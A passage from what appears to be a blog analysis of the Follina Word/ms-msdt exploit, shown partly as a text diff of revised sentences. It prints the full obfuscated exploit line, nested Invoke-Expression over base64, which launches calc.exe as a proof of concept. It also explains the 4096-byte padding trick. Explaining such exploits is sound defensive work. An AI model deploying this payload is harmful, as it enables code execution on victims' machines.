 Inside the word/_rels directory, an XML document contains the reference to the external link.

 When writing this blog, this link is no longer available online, but @nao_sec shared the original contents of RDF842l.html.

-The exploit is a HTML document that contains a series of A character.
-While it appears to be of no value the research shared by Rich Warren, it was identified a small amount of ‘A’ character is required for an exploit to run.
+The exploit is an HTML document that contains a series of A characters.
+While it appears to be of no value to the research shared by Rich Warren, a small amount of ‘A’ character is in requirement for an exploit to run.
 An HTML processing function had a hardcoded buffer size, and any files less than 4096 bytes would not trigger the payload.
 When writing this blog, this link is no longer online, but @nao_sec shared the original contents of RDF842l.html.

 window.location.href = “ms-msdt:/id PCWDiagnostic /skip force /param \”IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression(‘[System.Text.Encoding]’+[char]58+[char]58+’UTF8.GetString([System.Convert]’+[char]58+[char]58+’FromBase64String(‘+[char]34+’JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNhbGMuZXhlIjtTdGFydC1Qcm9jZXNzICRjbWQ7’+[char]34+’))’))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\””;

 Above lines are the heart of the exploit.
 It is encoded in base64.
 When we decode this, we get